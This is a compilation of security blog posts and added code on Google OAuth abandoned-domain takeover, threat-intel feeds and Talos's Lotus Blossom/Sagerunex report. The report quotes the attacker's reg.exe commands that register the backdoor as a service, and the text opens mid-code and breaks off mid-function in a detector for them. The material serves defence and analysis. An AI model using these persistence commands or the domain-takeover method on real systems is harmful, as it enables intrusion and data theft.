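IMAGE_SUFFIXES = (".png", ".jpg", ".jpeg", ".gif", ".emf")


def is_zip_container(data: bytes) -> bool:
    """True if the bytes start with a ZIP local-file header, whatever the
    extension says. DOCX/XLSX/PPTX and PAGES files all start this way."""
    return data[:4] == ZIP_LOCAL_HEADER


def container_report(data: bytes) -> dict:
    """Inventory a ZIP-based document without converting it: list entries,
    locate embedded media, and flag encrypted entries and macro storage."""
    if not is_zip_container(data):
        raise ValueError("not a ZIP-based container")
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        # Bit 0 of the general-purpose flag marks a password-protected entry.
        encrypted = [i.filename for i in zf.infolist() if i.flag_bits & 0x1]
        media = [n for n in names
                 if "/media/" in n.lower() and n.lower().endswith(IMAGE_SUFFIXES)]
        macros = [n for n in names if n.lower().endswith("vbaproject.bin")]
    return {"entries": names, "media": media, "encrypted": encrypted, "macros": macros}


def extract_media(data: bytes) -> dict:
    """Return {path: bytes} for every embedded image, exactly as stored."""
    report = container_report(data)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {n: zf.read(n) for n in report["media"]}


def build_sample_docx() -> bytes:
    """Constructed stand-in for a .docx: just enough OOXML-like layout for the
    demo, including a stub image and a macro store. Not a real document."""
    png_stub = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # PNG magic plus padding
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/media/image1.png", png_stub)
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0")  # OLE magic
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx()
    print(container_report(sample))
    for path, blob in extract_media(sample).items():
        print(path, len(blob), "bytes")
```

Two practical notes: a file that fails the signature check is not an OOXML document no matter what its extension claims, so there is nothing to unzip; and a report with non-empty encrypted or macros lists is the point at which to stop rummaging and hand the file to a proper scanner.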

Kaspersky official blog – Read More

Google OAuth: abandoned domains attack | Kaspersky official blog

Just over a year ago, in our post entitled Google OAuth and phantom accounts, we discussed how using the “Sign in with Google” option for corporate services allows employees to create phantom Google accounts that aren’t controlled by the corporate Google Workspace admin, and continue to function after offboarding. Recently, it was discovered that this isn’t the only issue with OAuth. Due to weaknesses in this authentication mechanism, anyone can gain access to data of many defunct organizations by re-registering domains they abandoned. In this article, we explore this attack in more detail.

How authentication works with “Sign in with Google”

Some organizations may believe that “Sign in with Google” provides a reliable authentication mechanism backed by Google’s advanced technology and vast user monitoring capabilities. However, in reality, the Google OAuth authentication check is quite basic. It generally comes down to verifying that a user has access to an email address linked to an organization’s Google Workspace.

Moreover, as mentioned in our previous article on Google OAuth, this doesn’t necessarily have to be a Gmail address — Google accounts can be linked to any email address. Therefore, the security of accessing a corporate service via “Sign in with Google” is only as strong as the security of the email linked to the Google account.

Now let’s get into the details…

When authenticating a user in a corporate service, Google OAuth sends that service an ID token whose payload carries the user’s claims, including the email address, the hosted domain and the account identifier:

[Figure: description of the Google OAuth ID token payload. In theory, the ID token includes a parameter called sub that is unique to each Google account; in practice, because of problems with how it behaves, services often check only the domain and email address.]

Google recommends that services use the sub parameter, claiming that this identifier is unique and constant for the user account — unlike an email address. But in reality, the sub parameter isn’t always constant; for a small number of users, it changes over time, which can cause authentication failures. As a result, services tend not to use it, and instead verify only the domain and email address — contrary to Google’s recommendations.
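To make the difference concrete, here is an added example (not code from the article or from Google) contrasting the two lookup strategies in a hypothetical service’s login handler. The user directory, the claim values and the sub identifiers are constructed; the token builder produces an unsigned JWT-shaped string purely so the decoding step has something realistic to work on, and id_token_claims assumes the signature, issuer, audience and expiry have already been verified. hd is the hosted-domain claim Google issues for Workspace accounts.

```python
import base64
import json


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def make_unsigned_id_token(claims: dict) -> str:
    """Assemble a JWT-shaped string (header.payload.signature) from claims.
    The signature segment is left empty: this is a constructed sample for the
    demo, not a token Google would ever issue."""
    header = _b64url(json.dumps({"alg": "RS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    return f"{header}.{payload}."


def id_token_claims(token: str) -> dict:
    """Decode the payload segment. Assumes the caller has ALREADY verified the
    RS256 signature against Google's published keys and checked iss, aud and
    exp; decoding alone proves nothing about who sent the token."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


# Constructed user directory of a hypothetical SaaS app, populated while
# defunct-startup.example was still a live Google Workspace tenant.
USERS = [
    {"id": 1, "email": "alice@defunct-startup.example",
     "google_sub": "110169484474386276334"},
]


def lookup_by_email(claims: dict):
    """The common practice the article describes: trust hosted domain + email."""
    email, hd = claims.get("email", ""), claims.get("hd", "")
    if not claims.get("email_verified") or not hd or not email.endswith("@" + hd):
        return None
    return next((u for u in USERS if u["email"] == email), None)


def lookup_by_sub(claims: dict):
    """Google's recommendation: key the account on the sub claim."""
    return next((u for u in USERS if u["google_sub"] == claims.get("sub")), None)


# Constructed claims. Same email and hosted domain, different sub, because the
# attacker's Workspace on the re-registered domain is a brand-new tenant.
LEGIT_CLAIMS = {
    "iss": "https://accounts.google.com", "sub": "110169484474386276334",
    "hd": "defunct-startup.example", "email": "alice@defunct-startup.example",
    "email_verified": True,
}
ATTACKER_CLAIMS = dict(LEGIT_CLAIMS, sub="105338201927364554170")


def demo() -> dict:
    """Which existing account each strategy links each token to (None = none)."""
    legit = id_token_claims(make_unsigned_id_token(LEGIT_CLAIMS))
    attacker = id_token_claims(make_unsigned_id_token(ATTACKER_CLAIMS))
    return {
        "legit_by_email": (lookup_by_email(legit) or {}).get("id"),
        "legit_by_sub": (lookup_by_sub(legit) or {}).get("id"),
        "attacker_by_email": (lookup_by_email(attacker) or {}).get("id"),
        "attacker_by_sub": (lookup_by_sub(attacker) or {}).get("id"),
    }


if __name__ == "__main__":
    print(demo())
```

Run as written, lookup_by_email links the attacker’s token to Alice’s existing account because the email and hosted domain match, while lookup_by_sub does not. Given the article’s point that sub occasionally changes, a defensible compromise is to key on sub and to treat a verified-email match with an unknown sub as a new, unlinked account that must be re-verified out of band, never as an automatic merge into the old one.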

“Sign in with Google” using an abandoned domain

Thus, an attacker can gain unauthorized access to a company’s services by simply having access to an email within that company’s domain. This is particularly easy to do if the company has ceased operations and abandoned its domain: anyone can register it for themselves.

The attacker can then create any email address under this domain, and use it to log into one of the services the company likely used. Some of these services may display a list of real users linked to the organization’s workspace — even if the address entered by the attacker was never actually used.

With this list — and complete control over all email addresses within the abandoned domain — the attacker can reconstruct the original Google Workspace of the defunct company. In this way, attackers can gain access to the profiles of former employees in services that used Google OAuth for authentication.

How serious a problem is this?

Dylan Ayrey, the researcher who discovered this Google OAuth vulnerability (and the previous issue with phantom accounts), aimed to demonstrate the severity of potential consequences. Using data from Crunchbase, Ayrey compiled a list of over 100,000 terminated startups whose domains are now up for sale.

Ayrey purchased one of these abandoned domains and tested the feasibility of the attack. Among the corporate services he managed to access using this vulnerability were Slack, Zoom, Notion, ChatGPT, and HR systems.

Thus, with this relatively simple attack requiring minimal resources, an attacker can gain access to a wealth of confidential information, ranging from employee correspondence and notes to personal data from HR systems.

According to Ayrey’s estimates, around 50% of startups use Google Workspace. If we suppose that the average defunct startup had about 10 employees, we could be talking about hundreds of thousands of people and millions of vulnerable accounts.

Who’s responsible, and what can be done?

Ayrey dutifully notified Google of this vulnerability through its bug bounty program. He also suggested a long-term solution: creating truly permanent and unique identifiers for Google accounts and Google Workspace. However, his report was initially rejected, with the comment “no fix needed” and labeled as “fraud or abuse”!

However, a few months after Ayrey presented his findings at a hacker conference (!) the report was reopened, and he was awarded $1337. Notably, he received the same minimal reward for his previous discovery of the phantom Google accounts vulnerability.

According to Ayrey, Google promised to fix the vulnerability in Google OAuth, but didn’t specify when or how exactly they plan to do this. Therefore, the problem with the “Sign in with Google” mechanism remains an unresolved issue, for which no one is willing to take responsibility. Potential victims of this attack include former employees of defunct companies who no longer have control over their accounts. Worse still, there’s no one to hold accountable for the security of these accounts anymore.

The wise move here would be for companies to take preventive measures in advance. However, very few startups seriously plan for their own demise — let alone what will happen afterward.

Fortunately, defending against this Google OAuth vulnerability is relatively straightforward. There are two non-mutually exclusive options:

  • Use a traditional login-and-password combo instead of “Sign in with Google”, and always enable two-factor authentication.
  • If your company ceases operations, don’t abandon workspaces in corporate services; delete them instead. This is quite easy to do; for example, here are the instructions for Slack and Notion.

Kaspersky official blog – Read More

Sellers can get scammed too, and Joe goes off on a rant about imposter syndrome

Welcome to this week’s edition of the Threat Source newsletter. 

Hello again, my friends! Geez, it’s been a year, am I right? Lemons, it’s February you say?! Oof.

Imposter syndrome. You’ve heard the term I’m sure, but what is it? Basically: imposter syndrome is the persistent feeling of self-doubt and fear of being exposed as a fraud despite clear evidence of competence and success. In cybersecurity, and especially in Talos, you will find imposter syndrome in abundance.

In Talos you’re in rooms of incredibly bright and smart people. They are paragons of what it is to be hackers, and you cannot help but often admire the amazing quality of their work. It is truly an amazing team that does important work to help save the world from the bad guys.  

The downside? You’re in a room of bright and smart people. Some can reverse malware binaries while juggling chainsaws. Some are polyglots who can tell you at length about the linguistic nuances of Mesopotamian verbs and loanwords, and have an eidetic memory of every ransomware cartel ever. I personally know one who is an amazing, accredited musician and actually hacked a prison to open its jail cells on a pentest.

How do you not compare yourself to the talents, skills, and achievements of wonderfully smart and talented people? It’s tough not to. Comparison is truly the thief of joy.  

The truth is – in cybersecurity, in places like Talos and elsewhere, you will constantly assail yourself with self-doubt about achievement and belonging. The anxiety, stress, and burnout from imposter syndrome are a real thing.

So what do we do? First, look at your achievements. You are where you are because others saw value in your work. Second, challenge those negative self-thoughts. Easier said than done, I know, but hear me out. Use mentors and peer group support to help challenge those negative self-thoughts.

And lastly, be kind to yourself. Cybersecurity is a hard gig. It’s a gigantic amount of technical and non-technical information and we all feel the pressure to absorb, understand, and master it and all its nuances. That’s not possible of course, but we cyber folks are wired differently. If you can walk away with 1% more information than you had yesterday, that’s a win. Take it. Just be kind to yourself, ok? 

I want to take a moment to address a specific audience of readers. All the U.S.  federal workers who have been affected by reduction in force (RIFs), my heart goes out to you. This is an unearned hardship. I wish I had a magic wand to wave to alleviate the stress and trauma of a sudden event like this. I know it’s truly awful. If I can offer any guidance or mentorship for private sector cybersecurity, reach out. I may not have all the answers, but I will do what I can. Stay strong.  

The one big thing

Boy howdy is this a big one – scams! Look, the average person isn’t going to get smoked by Salt/Volt Typhoon, or wrestle with a financial threat actor like a ransomware cartel. But you absolutely have bought and sold things online. We break down seller abuse – that is, ways of tricking sellers into being defrauded out of money. We always picture scams as the seller doing the defrauding, but the reverse is just as true.

Why do I care?

You want to keep money in your pocket, and not be the victim of a scam. The adversaries here know the systems they are manipulating quite well and have fine-tuned the art of fraud. It’s important to understand the seller experience as much as the buyer experience in order to understand these kinds of frauds and thefts.

So now what?

Understand the threat landscape for seller/buyer fraud, and hopefully this work can help keep money in your pocket and keep you from becoming a victim of theft. Pay attention to the URLs you’re asked to click, and to clever redirects to scamming websites. Now you know. And as G.I. Joe said – knowing is half the battle.

Top security headlines of the week

Sensitive financial and health data belonging to millions of veterans and stored on a benefits website is at risk of being stolen or otherwise compromised, according to a federal employee tasked with cybersecurity who was recently fired as part of massive government-wide cuts. (AP News)

Attackers are wielding a novel Linux backdoor against the education and public sectors in the US and Asia that demonstrates particularly stealthy ways to avoid both detection and deletion from a system. (Dark Reading)

Hackers claim to have published a trove of sensitive data belonging to IVF patients after a cyberattack on Genea, one of Australia’s largest fertility providers. (TechCrunch)

Can’t get enough Talos?

The Beers with Talos B-team comes in swinging hard on cyber security careers. I get a little spicy, and you want to hear it. Now that I know we bleep certain words, I anticipate a 50% uptake in more spicy content. You can all blame Hazel for this.

New research: Lotus Blossom espionage group targets multiple industries with different versions of Sagerunex and hacking tools

A blueprint for protecting major events – Yuri Kramarz joins Talos Takes to discuss his experience in cybersecurity and threat hunting for some of the world’s biggest sporting events.

Upcoming events where you can find Talos

RSA (April 28-May 1, 2025)  San Francisco, CA  

CTA TIPS 2025 (May 14-15, 2025) Arlington, VA 

Cisco Live U.S. (June 8 – 12, 2025) San Diego, CA 

Most prevalent malware files from Talos over the past week

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca 

MD5: 71fea034b422e4a17ebb06022532fdde 

VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details 

Typical Filename: VID001.exe 

Claimed Product: N/A 

Detection Name: Coinminer:MBT.26mw.in14.Talos 

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

MD5: 2915b3f8b703eb744fc54c81f4a9c67f  

VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  

Typical Filename: VID001.exe  

Detection Name: Simple_Custom_Detection

Cisco Talos Blog – Read More

Enriching ANY.RUN’s TI Feeds with Unique IOCs: How It Works

Threat Intelligence Feeds from ANY.RUN provide a continuously-updated stream of the latest indicators of compromise. They enable SOC teams to quickly detect and mitigate attacks, including the emerging malware and persistent threats.

But how do ANY.RUN’s feeds get enriched with fresh and, most importantly, unique indicators that cannot be found elsewhere?

Let’s find out.

About ANY.RUN’s Threat Intelligence Feeds

ANY.RUN’s Threat Intelligence (TI) Feeds offer an extensive collection of Indicators of Compromise (IOCs) designed to enhance the threat detection capabilities of security systems. These feeds provide detailed information beyond the basics, including malicious IPs, URLs, domains, file hashes, and links to actual analysis sessions. This comprehensive data helps you understand how threats operate and behave in real-world scenarios.

Where does this data come from?

An international community of over 500,000 researchers and cybersecurity pros who upload and analyze real-world malware and phishing samples every day to ANY.RUN’s Public submissions repository.

With TI Feeds from ANY.RUN, organizations can:

  • Expand and speed up threat hunting with enriched, up-to-date data.
  • Enhance alert triage and prioritize the most urgent issues.
  • Improve incident response through a better understanding of threats and their behaviors.
  • Proactively defend against new and evolving threats.

IOCs Provided by ANY.RUN TI Feeds 

TI Feeds contain indicators along with additional info such as the threat score, which signals the indicator’s reliability:

  • 100: Highly reliable
  • 75: Trustworthy
  • 50: Suspicious

Here are the indicators you can find in ANY.RUN’s TI Feeds.

IP addresses

Compromised IPs are an immediate signal of cybercriminal operations; they are often linked to Command-and-Control (C2) servers or phishing campaigns. By analyzing IP addresses, cybersecurity teams can proactively block suspicious traffic and study attack patterns and tactics.

Domains  

They provide a higher-level view of malicious activity, often connecting multiple IPs or malware instances within a single campaign.  

ANY.RUN’s TI feeds provide comprehensive information about domains, including all the details available for IP addresses, such as threat names, types, detection timestamps, and related file hashes. 

URLs  

URL addresses serve as gateways to distribute malware, execute phishing campaigns, or redirect users to malicious content.   

By analyzing URLs, cybersecurity teams can uncover attack patterns, block harmful traffic, and prevent unauthorized access to systems and data. 
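As an added illustration (not ANY.RUN’s code or feed format), here is how a SOC might consume such a feed once it arrives as a STIX 2.1 bundle: parse the indicator patterns, keep only those at or above a reliability threshold, and drop anything that would be unsafe to push into a blocklist. The bundle is constructed, the family names and addresses in it are placeholders (RFC 5737 documentation addresses), and carrying the threat score in the STIX confidence property is an assumption about the feed’s layout rather than something the article states.

```python
import ipaddress
import json
import re

# Constructed STIX 2.1 bundle in the shape of an indicator feed. Confidence
# stands in for the feed's threat score (an assumption, see the lead-in).
SAMPLE_BUNDLE = json.dumps({
    "type": "bundle",
    "id": "bundle--1f2e3d4c-0000-4000-8000-000000000000",
    "objects": [
        {"type": "indicator", "id": "indicator--1f2e3d4c-0000-4000-8000-000000000001",
         "pattern_type": "stix", "confidence": 100, "name": "AsyncRAT C2 (sample)",
         "pattern": "[ipv4-addr:value = '203.0.113.10']"},
        {"type": "indicator", "id": "indicator--1f2e3d4c-0000-4000-8000-000000000002",
         "pattern_type": "stix", "confidence": 75, "name": "FormBook C2 (sample)",
         "pattern": "[domain-name:value = 'updates.example.net']"},
        {"type": "indicator", "id": "indicator--1f2e3d4c-0000-4000-8000-000000000003",
         "pattern_type": "stix", "confidence": 50, "name": "Suspicious download (sample)",
         "pattern": "[url:value = 'http://203.0.113.20/dl/setup.exe']"},
        {"type": "indicator", "id": "indicator--1f2e3d4c-0000-4000-8000-000000000004",
         "pattern_type": "stix", "confidence": 100, "name": "Noise: private address",
         "pattern": "[ipv4-addr:value = '10.0.0.5']"},
        {"type": "malware", "id": "malware--1f2e3d4c-0000-4000-8000-000000000005",
         "name": "AsyncRAT", "is_family": True},
    ],
})

# Single-comparison patterns only; compound patterns are skipped, not guessed at.
PATTERN_RE = re.compile(r"^\[(ipv4-addr|domain-name|url):value\s*=\s*'([^']+)'\]$")

# Ranges that must never land in a perimeter blocklist, whatever the feed says.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_routable_ipv4(value: str) -> bool:
    addr = ipaddress.ip_address(value)
    return addr.version == 4 and not any(addr in net for net in NON_ROUTABLE)


def parse_indicators(bundle_json: str, min_confidence: int = 75) -> list:
    """Return (kind, value, name) for indicators at or above the threshold."""
    out = []
    for obj in json.loads(bundle_json)["objects"]:
        if obj.get("type") != "indicator" or obj.get("confidence", 0) < min_confidence:
            continue
        m = PATTERN_RE.match(obj.get("pattern", ""))
        if not m:
            continue
        kind, value = m.group(1), m.group(2)
        if kind == "ipv4-addr" and not is_routable_ipv4(value):
            continue
        out.append((kind, value, obj.get("name", "")))
    return out


def to_blocklist(bundle_json: str, min_confidence: int = 75) -> dict:
    """Group the surviving indicators by type, ready for a firewall/DNS/proxy."""
    lists = {"ipv4-addr": [], "domain-name": [], "url": []}
    for kind, value, _ in parse_indicators(bundle_json, min_confidence):
        lists[kind].append(value)
    return lists


if __name__ == "__main__":
    print(to_blocklist(SAMPLE_BUNDLE))
```

With the default threshold of 75 the blocklist carries the two high-confidence network indicators and leaves the 50-score URL for analyst review; lowering the threshold pulls the URL in, while the private address is dropped at any score.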

How ANY.RUN’s TI Feeds Are Enriched with Unique IOCs 

Several features of Threat Intelligence Feeds stand out, but one of the key factors is the way we collect indicators. Here are the two methods we use to get the latest and most accurate indicators.

IOCs Extracted from Malware Configurations 

TI Feeds are fueled by data from ANY.RUN’s Interactive Sandbox, which provides, among other things, the option to extract malware configurations from memory dumps.

Configurations are crucial for understanding malware’s behavior and functions, tying it to a family and an adversary, and identifying all types of Indicators of Compromise (IOCs), which are then used for detection purposes. Such IOCs are particularly valuable as they contain hardcoded details such as command and control (C2) server addresses, encryption keys, and specific attack parameters.

Take a look at this sandbox session.

By opening the MalConf tab we can observe the extracted configuration of an AsyncRAT sample. One of the pieces of data found here is the malicious IP address used by the malware for communication with its C2 server.

ANY.RUN automatically extracts this crucial indicator and sends it to TI Feeds, which then get fed into the clients’ detection systems. This helps them identify the threat early and minimize its potential impact.

IOCs Detected with Suricata IDS Rules 

Indicators detected with Suricata rules are valuable because they focus on identifying patterns in network traffic rather than specific details like IP addresses or domains. This means Suricata can recognize threats even when attackers change their infrastructure.

Thanks to ANY.RUN’s extensive integration of Suricata rules for traffic analysis, we can consistently extract fresh network indicators of numerous malware families and cyber threats.
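A rule of the kind this paragraph describes, written here as a hypothetical illustration rather than one of ANY.RUN’s rules or a real FormBook signature: it keys on the shape of the check-in (HTTP method, URI path, User-Agent prefix) instead of on any address, so it keeps firing after the operator moves to new infrastructure. The URI and User-Agent values are made up for the example, and the sid is from the local-rules range.

```text
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"HYPOTHETICAL RAT check-in: POST /gate.php with fixed UA prefix"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/gate.php"; endswith; http.user_agent; content:"Mozilla/4.0 (compatible"; startswith; classtype:trojan-activity; sid:1000001; rev:1;)
```

The trade-off cuts both ways: the rule fires on any sample that shares the check-in shape, including new variants, but a rebuilt client with a different URI or User-Agent slips past until the rule is revised. That is why infrastructure indicators and traffic-pattern detections are fed into the same list rather than one replacing the other.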

Check out this report, which shows analysis of a FormBook sample.

Suricata rule triggered after detecting FormBook’s C2 traffic

When we navigate to the Threats tab and then click on one of the triggered Suricata rules, we can see that the system has detected connection to domain controlled by the attackers.

You can see the domain name used by FormBook

As you would expect, this domain is sent directly to TI Feeds, strengthening our clients’ defense capabilities.

Integrate ANY.RUN’s TI Feeds 

ANY.RUN offers demo feed samples in STIX and MISP formats

You can test ANY.RUN’s Threat Intelligence Feeds in STIX and MISP formats completely for free by getting a free demo sample here

ANY.RUN also runs a dedicated MISP instance that you can synchronize your server with or connect to your security solutions. To get started, contact our team via this page

About ANY.RUN  

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

Get a 14-day free trial of ANY.RUN’s Threat Intelligence service →

ANY.RUN’s Cybersecurity Blog – Read More

Lotus Blossom espionage group targets multiple industries with different versions of Sagerunex and hacking tools

  • Cisco Talos discovered multiple cyber espionage campaigns that target government, manufacturing, telecommunications and media, delivering Sagerunex and other hacking tools for post-compromise activities. 
  • Talos attributes these attacks to the threat actor known as Lotus Blossom. Lotus Blossom has actively conducted cyber espionage operations since at least 2012 and continues to operate today. 
  • Based on our examination of the tactics, techniques, and procedures (TTPs) utilized in these campaigns, alongside the deployment of Sagerunex, a backdoor family used exclusively by Lotus Blossom, we attribute these campaigns to the Lotus Blossom group with high confidence.  
  • We also observed Lotus Blossom gain persistence using specific commands to install their Sagerunex backdoor within the system registry and configuring it to run as a service on infected endpoints.  
  • Lotus Blossom has also developed new variants of Sagerunex that not only use traditional command and control (C2) servers but also use legitimate, third-party cloud services such as Dropbox, Twitter, and the Zimbra open-source webmail as C2 tunnels. 

A multi-campaign, multi-variant backdoor operation  

Talos assesses with high confidence that Lotus Blossom (also referred to as Spring Dragon, Billbug, Thrip) threat actors are responsible for these campaigns. The group was previously publicly disclosed as an active espionage group operating since 2012. Our assessment is based on the TTPs, backdoors, and victim profiles associated with each activity. Our observations indicate that Lotus Blossom has been using the Sagerunex backdoor since at least 2016 and is increasingly employing long-term persistence command shells and developing new variants of the Sagerunex malware suite. The operation appears to have achieved significant success, targeting organizations in sectors such as government, manufacturing, telecommunications and media in areas including the Philippines, Vietnam, Hong Kong and Taiwan.  

Our investigation uncovered two new variants of the Sagerunex backdoor, which were detected during attacks on telecommunications and media companies, as well as many Sagerunex variants persistent in the government and manufacturing industries. These new variants no longer rely on the original Virtual Private Server (VPS) for their C2 servers. Instead, they use third-party cloud services such as Dropbox, Twitter, and the Zimbra open-source webmail service as C2 tunnels to evade detection. In our malware analysis section, we will delve into the technical specifics of each Sagerunex backdoor variant and illustrate their configurations. Some configurations reveal the possible original file paths of the malware, providing insights into the threat actor’s host paths. 

  

We also compiled a timeline for the evolution of Sagerunex by analyzing data from the campaigns we observed, third-party reports, malware compilation timestamps, and the timestamps of victim uploads on the C2 service: 

[Figure: timeline of the evolution of Sagerunex variants]
Attributing the attacks to Lotus Blossom 

Talos has identified strong evidence to attribute these campaigns to the Lotus Blossom group, primarily due to the presence of the Sagerunex backdoor within these operations. Sagerunex is a remote access tool (RAT) assessed to be an evolution of an older Billbug tool known as Evora. Sagerunex is designed to be injected into an infected endpoint as a dynamic link library (DLL) and executed directly in memory.

 

We also observed the Sagerunex backdoor employ various network connection strategies to ensure it remains under the actor’s control. Despite the development of three distinct variants, the foundational structures and core functionalities of the backdoor remain consistent. These consistent elements enable us to confidently categorize all identified variant backdoors as part of the Sagerunex family.  

 

Moreover, the consistent patterns in victimology and the TTPs identified across these campaigns strongly support our attribution to the Lotus Blossom espionage group. This consistency, seen in the selection of targets and the methods employed, aligns with the known operational characteristics of Lotus Blossom, providing compelling evidence that these campaigns are orchestrated by this specific threat actor. 

Lotus Blossom’s latest attack chain  

We conducted research into the main elements of the attack, including the specific functions of each malware strain and how Lotus Blossom managed to evade detection for several months. We also observed the threat actor leverage a number of hacking and open-source tools to achieve their objectives.

  • Cookie stealer tool: a PyInstaller bundle of an open-source Chrome cookie stealer from GitHub. Lotus Blossom used it to harvest Chrome browser credentials.
  • Venom proxy tool: a proxy tool written in Go for penetration testers. The threat actor customized Venom and hardcoded the destination IP address for each activity.
  • Adjust privilege tool: enabled the threat actor to retrieve another process’s token and adjust the privileges of the process it launches.
  • Archiving tool: a customized compression-and-encryption tool that let the attacker collect individual files or entire folders into a protected archive at a chosen path for theft. For example, the tool archived the Chrome and Firefox browser cookie folders.
  • Port relay tool: the threat actor named this tool “mtrain V1.01”; it is a modified proxy relay tool derived from HTran. The tool allowed the threat actor to relay the connection from the victim machine to the internet.
  • RAR tool: an archive manager the threat actor used to archive or zip files.

Extended persistence   

Lotus Blossom frequently utilizes the Impacket tool to execute remote processes and commands within the victim’s environment, consistent with known Lotus Blossom TTPs. Once they gain access to a target, their operations typically unfold over multiple stages. Each stage is carefully executed, indicating a well-planned strategy aimed at achieving long-term objectives. This multi-stage approach enables them to maintain a presence in the network for extended periods, often going undetected for several months. Below is an example visualization of the overall attack chain.


In the compromised environment, the threat actor executes various commands such as “net,” “tasklist,” “quser,” “ipconfig,” “netstat,” and “dir.” These commands are used to gather detailed information about user accounts, directory structures, process activities, and network configurations. Following the initial reconnaissance, the actor assesses whether the compromised machine can connect to the internet. If internet access is restricted, the actor has two strategies: using the target’s proxy settings to establish a connection, or using the Venom proxy tool to link the isolated machines to internet-accessible systems. Additionally, we have noticed that the actor frequently deposits backdoor and hacking tools in the “public\pictures” subfolder. This location is accessible to all users and, unlike system folders, is not hidden or protected, making it a strategic choice for evasion and continued access.

 

Besides running commands for discovery and lateral movement, we also observed Lotus Blossom use specific commands to install their notorious Sagerunex backdoor within the system registry, configuring it to run as a service. Presented below are the command lines the actor used to install the backdoor as a service. 

reg add HKLM\SYSTEM\CurrentControlSet\Services\tapisrv\Parameters /v ServiceDll /t REG_EXPAND_SZ /d c:\windows\tapisrv.dll /f
reg add HKLM\SYSTEM\CurrentControlSet\Services\tapisrv /v Start /t REG_DWORD /d 2 /f
reg add HKLM\SYSTEM\CurrentControlSet\Services\swprv\Parameters /v ServiceDll /t REG_EXPAND_SZ /d c:\windows\swprv.dll /f
reg add HKLM\SYSTEM\CurrentControlSet\Services\swprv\Parameters /v ServiceDll /t REG_EXPAND_SZ /d c:\windows\system32\swprv.dll /f
reg add HKLM\SYSTEM\CurrentControlSet\Services\appmgmt\Parameters /v ServiceDll /t REG_EXPAND_SZ /d c:\windows\swprv.dll /f
reg add HKLM\SYSTEM\CurrentControlSet\Services\appmgmt /v Start /t REG_DWORD /d 2 /f
reg add HKLM\SYSTEM\CurrentControlSet\Services\appmgmt\Parameters /v ServiceDll /t REG_EXPAND_SZ /d c:\windows\system32\appmgmts.dll /f

 

The actor used the following commands to verify that the backdoor can successfully run as a service.  

reg query HKLM\SYSTEM\CurrentControlSet\Services\swprv\Parameters
reg query HKLM\SYSTEM\CurrentControlSet\Services\tapisrv\Parameters
reg query HKLM\SYSTEM\CurrentControlSet\Services\appmgmt\Parameters
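The commands above rewrite the ServiceDll value that svchost.exe loads for a service, which is why a ServiceDll path outside System32 is worth alerting on. The following Python is an added example, not Talos tooling: it parses reg.exe command lines as an EDR would record them (the sample lines are the ones quoted above, plus one constructed benign HKCU write and one constructed %SystemRoot% form) and flags ServiceDll rewrites, scoring those that point outside System32 or SysWOW64 as high and any service start type changed to automatic as low. The %SystemRoot% expansion and the severity labels are assumptions of this example.

```python
"""Flag svchost ServiceDll persistence in reg.exe command-line telemetry.

Added example, not Talos code. Sample lines: the reg.exe commands quoted in
the write-up plus constructed benign ones; scoring is an illustration.
"""
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Services key with an optional trailing \Parameters subkey.
SERVICES_KEY = re.compile(
    r"^HK(?:LM|EY_LOCAL_MACHINE)\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})"
    r"\\Services\\(?P<service>[^\\]+)(?P<params>\\Parameters)?$",
    re.IGNORECASE,
)
# Directories where a legitimate svchost-hosted ServiceDll normally lives.
SYSTEM_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Constructed sample: reg.exe command lines as an EDR would record them.
SAMPLE_CMDLINES = [
    r"reg add HKLM\SYSTEM\CurrentControlSet\Services\tapisrv\Parameters /v ServiceDll /t REG_EXPAND_SZ /d c:\windows\tapisrv.dll /f",
    r"reg add HKLM\SYSTEM\CurrentControlSet\Services\tapisrv /v Start /t REG_DWORD /d 2 /f",
    r"reg add HKLM\SYSTEM\CurrentControlSet\Services\appmgmt\Parameters /v ServiceDll /t REG_EXPAND_SZ /d c:\windows\swprv.dll /f",
    r"reg add HKLM\SYSTEM\CurrentControlSet\Services\appmgmt\Parameters /v ServiceDll /t REG_EXPAND_SZ /d c:\windows\system32\appmgmts.dll /f",
    r"reg query HKLM\SYSTEM\CurrentControlSet\Services\swprv\Parameters",
    r"reg add HKCU\Software\ExampleVendor /v Setting /t REG_SZ /d value /f",  # benign, constructed
]


@dataclass
class Finding:
    severity: str   # "high", "medium" or "low" (labels assumed for this example)
    service: str
    value: str
    data: str
    reason: str


def _opts(tokens: List[str]) -> dict:
    """Collect /v, /t and /d arguments from a reg.exe argument list."""
    opts = {}
    i = 0
    while i < len(tokens):
        flag = tokens[i].lower()
        if flag in ("/v", "/t", "/d") and i + 1 < len(tokens):
            opts[flag] = tokens[i + 1].strip('"')
            i += 2
        else:
            i += 1
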